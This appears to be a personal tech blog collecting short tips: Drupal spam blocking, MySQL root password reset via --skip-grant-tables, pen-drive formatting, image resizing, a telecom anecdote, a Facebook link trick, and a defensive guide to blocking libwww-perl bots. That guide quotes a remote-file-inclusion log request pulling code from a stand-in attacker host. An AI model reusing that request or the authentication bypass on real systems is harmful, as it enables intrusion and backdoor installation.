How to stop/prevent drupal registration spam?

[dfads params=’groups=-1′]

I am a web developer at IGNOU. I have been maintaining IGNOU Website ignou.ac.in since August, 2013. Yesterday, my colleague found that there were number of users automatically registered and asked me to handle the issue.

I studied the issue and found that the users registered were spam having similar kind of email addresses. I explored the internet and found a solution.

Block the offending domains:

I went to the Access Rules section in the admin panel (admin/user/rules), and added a DENY rule for each of the domains. The rule configuration takes a wildcard, so I could simply enter %@http://pray.agencja-csk.pl.

I also found that access rules functionality has been removed from the Drupal 7 core. It is now provided by the User restrictions module.

[dfads params=’groups=-1′]

How to update mysql root password in mysql?

[dfads params=’groups=-1′]

 

The Following five steps will help you to update your mysql root password in mysql:

Step # 1: Stop the MySQL server process.

Step # 2: Start the MySQL (mysqld) server/daemon process with the –skip-grant-tables option so that it will not prompt for a password.

Step # 3: Connect to the MySQL server as the root user.

Step # 4: Set a new root password.

Step # 5: Exit and restart the MySQL server.

Here are the commands you need to type for each step (log in as the root user):

Step # 1 : Stop the MySQL service:

# /etc/init.d/mysql stop

Output:

Stopping MySQL database server: mysqld.

Step # 2: Start the MySQL server w/o password:

# mysqld_safe –skip-grant-tables &

Output:

[1] 5988
Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started

Step # 3: Connect to the MySQL server using the MySQL client:

# mysql -u root

Output:

Welcome to the MySQL monitor.  Commands end with ; or g.
Your MySQL connection id is 1 to server version: 4.1.15-Debian_1-log

Type ‘help;’ or ‘h’ for help. Type ‘c’ to clear the buffer.

mysql>

Step # 4: Set a new MySQL root user password:

mysql> use mysql;
mysql> update user set password=PASSWORD(“NEW-ROOT-PASSWORD”) where User=’root’;
mysql> flush privileges;
mysql> quit

Step # 5: Stop the MySQL server:

# /etc/init.d/mysql stop

Output:

Stopping MySQL database server: mysqld
STOPPING server from pid file /var/run/mysqld/mysqld.pid
mysqld_safe[6186]: ended

[1]+  Done                    mysqld_safe –skip-grant-tables

Start the MySQL server and test it:

# /etc/init.d/mysql start
# mysql -u root -p

 

[dfads params=’groups=-1′]

Embed your latest tweets on your website the API v1.1

[dfads params=’groups=-1′]

Procedure

Side note: There are many ways to connect to Twitter, but this post isn’t about how to make authenticated calls to the API. Here, we are just going to focus on the simple display of a timeline without authentication.

  1. Log into your twitter account
  2. Go to your widget management page using https://twitter.com/settings/widgets
  3. Create your widget choosing the timeline source of your choice (user, favs, list or search)
  4. Copy and paste the code into the HTML of your site.
  5. Change the settings you are able to change (which isn’t much) to your liking (read from Client Side Options and onwards on the embedded timelines page)

Example

A simple example with a status timeline limited to 5 tweets (data-tweet-limit=”5″), a transparent background, no header, no footer (data-chrome=”nofooter noheader transparent”), and the color of my choice for the links (data-link-color=”#1BB5E0″) and borders (data-border-color=”#B5DDE8″).

 

Screenshot from 2013-08-16 17:37:39

[dfads params=’groups=-1′]

How to format pen drive in ubuntu

[dfads params=’groups=-1′]

Many times it happens that your pen drive or memory cards does not formatted from file manager so you have to format it from terminal. In this tutorial, it is shown that how to format pen drive
or any other hard-disk or memory card from terminal using commands in Ubuntu.
This video gives you a complete idea of how to format pen drive from terminal and which commands you have to type.
I also attached the screenshots of this commands from terminal window step by step.
[1]  First of all type the below command for know the name of your pen
       drive or memory card. [here | (pipe) operator is used which is given
       above your enter key in most of keyboards.]
       dmesg | tail

 

[2]  Then unmount your pen drive using the following command.
       sudo umount /dev/sdb1
And enter your password.
[3]  Then enter the following command to format your pen drive with
        FAT32 partition.
       sudo mkfs.vfat -n ‘Ubuntu’ -I /dev/sdb1
Your pen drive is now formatted and ready to use.

[dfads params=’groups=-1′]

Source [http://daksh21ubuntu.blogspot.in/2011/12/how-to-format-pen-drive-from-terminal.html]

Resize Multiple images in a folder (Batch Image Resize) in Ubuntu

[dfads params=’groups=-1′]

You can resize multiple image files (jpg/png/gif….) stored in a folder by the imagemagick package. Here is step-by-step guideline:

1. Install imagemagick from Ubuntu Software Center

Or, in the terminal:

sudo apt-get install imagemagick

2. Put all your image files in a single directory.

3. Open a terminal and go to this directory:

cd <directory-location>

4. Now, enter following command to resize all of the images to a specific percentage. For examples, for the following command, all of the images will be reduced to 50% of their dimension maintaining the ratio.

mogrify -resize 50% -format jpg *

Where -format jpg specifies: the resultant format will be JPG.

You may also specify width and height by the following command:

mogrify -resize 800x600 -format jpg *

You can easily guess, the resultant images will be of width 800 px and height of 600 px, keeping the original ratio.

[Source: http://bit.ly/fZNKeK]

[dfads params=’groups=-1′]

How Telecom Operators cheat their customers?

[dfads params=’groups=-1′]

This is really worth reading. Please, Please, Please Follow & share this Information.

I am an Airtel User. I was charged 2Paise/Sec for no any Tarrif enabled. i.e. 1.2 Rupees for 60 Secs. This amount was quite expensive compared to charges of other Operators. So, one of my friend suggested me to do the following:

1. First, generate a UPC (Unique Porting Code). This can be done by sending an SMS to 1900.
The SMS should be in this format: PORT
Eg: PORT <99XXXXXXXX>.

This should be sent to 1900
Operator SMS charge will be applicable.

2. In reply, you will receive a UPC (Unique Porting Code) as SMS from 1901. The UPC will be an 8 digit alpha- numeric code. You will also receive the date till when the UPC will remain valid in the MM/DD/YYYY format.

3. Wait for the call back from the Customer Care.

Well, the process is changing the Number Portability from one Operator to another. Great, I thought of changing to MTNL.

[dfads params=’groups=-1′]

BUT Guess What Happens when the Customer Care Called…

She asks: What is the reason for changing the Operator?
I reply: Well, it is too expensive for me to use this Operator. Please shift me to MTNL

She explains: Sir, We have these plans (30Paise/Min for this tarrif, 40Paise/Min for another Tarrif) for you & are cheaper than ur current Call Rate.
I replied: Mam, Isn’t there any scheme that charge me on the basis of Per Second not Per minute.

She Explains: Well sir, there is a plan where you will be charged 1.2 Paise/2Secs. Can I activate this Plan?
I replied: Mam, the Line is getting disturbed, Can you repeat the plan once again? (Had to confirm the plan, LOL, and to think for a while for calculation.. heheheh, yeah.. means 36Paise/Minute, ummm gr8)

She Repeats: Sir, there is a plan where you will be charged 1.2 Paise/2Secs. Can I activate this Plan?
I reply: (Already had made my mind ). Definitely Mam, Thank You Very Much.

She says: Sir, your plan will be activated in 2.5Hrs. Thank You.
Guys this is how works happening in India. “Saala, Sidhi ungli se to Ghee nikalti hi nahi”. I was damn unaware about this. I’d have saved thousands of bugs if I’d ‘ve known this earlier. Friends, If you are an Airtel user & still a victim please Follow this post and let others also know about this information.

I wonder how people are cheated by all these bureaucrats.

Thanx for Reading

Dev
Via #MuzikalIndia

[dfads params=’groups=-1’]

The rise of bots, spammers, crack attacks and libwww-perl

[dfads params=’groups=-1′]

libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.

Verify bots…

Following is a typical example, you will find in your apache or lighttpd access.log log file:

$ grep ‘libwww-perl’ access.log

OR

$ grep ‘libwww-perl’ /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.

You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}

Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl
Output:

Error: 403 Forbidden

You should see 403 Forbidden error as your user-agent is blocked by server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.

Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

 

[source 1=”http://www.cyberciti.biz” language=”:”][/source]
[dfads params=’groups=-1′]

Muzikal India – That sells Musical Instruments online

MuzikalIndia is an e-commerce web portal that runs on both Personal Computers & Hand Held Devices. Our product sells musical instruments to customers online. We aim to help low capitalized musical stores to create an online presence. Our targetted customers are students, musicians/bands/orchestras, music schools, etc..
Most of the online musical stores in India are owned by highly capitalized stores. These stores cater only to some of the metro cities like Bangalore, Chennai, Mumbai. Low capitalized musical stores are lagging back on online presence. Thus, by sorting out these problems we came up with a solution called muzikalindia.com. This helps small musical stores to present their musical instruments on our portal. On the other hand, customers will also be benefited. They will get multiple options of stores and products before choosing a product, thus, saving time of purchase and research.

Muzikal india also promises to provide tutors for beginners to start their campaign. It has its own blog called blog.muzikalindia.com which helps users to learn instruments online. The blog also provides various information regarding musical instruments, news, events, etc.

Buy Musical instruments online from http://muzikalindia.com

Regards
Team MuzikalIndia

Post a hyperlink on Facebook Wall Post

[dfads params=’groups=-1′]

Hello Friends, after an hour spending in search of the topic I finally found a way via which we can add hyperlinks in our facebook status. Check them out.

Method 1.Copy & paste the code below on your facebook wall post. Replace the text “Click here to view the ubliest profile ever” to your own.

@[1: ]@@[1:[0:1: Click here to view the ugliest profile ever! ]]

Method 2. Modify the code below as following.

PROFILE_ID: Your Profile Id i.e. 100002925714087 as of mine

CUSTOM_TEXT: Text you want to make visible

@@[0:[PROFILE_ID:1:CUSTOM_TEXT]]
@[PROFILE_ID:0]

Thanks

Dev

[Source: http://www.doncaprio.com/2011/11/embed-custom-link-facebook-status.html]

[dfads params=’groups=-1′]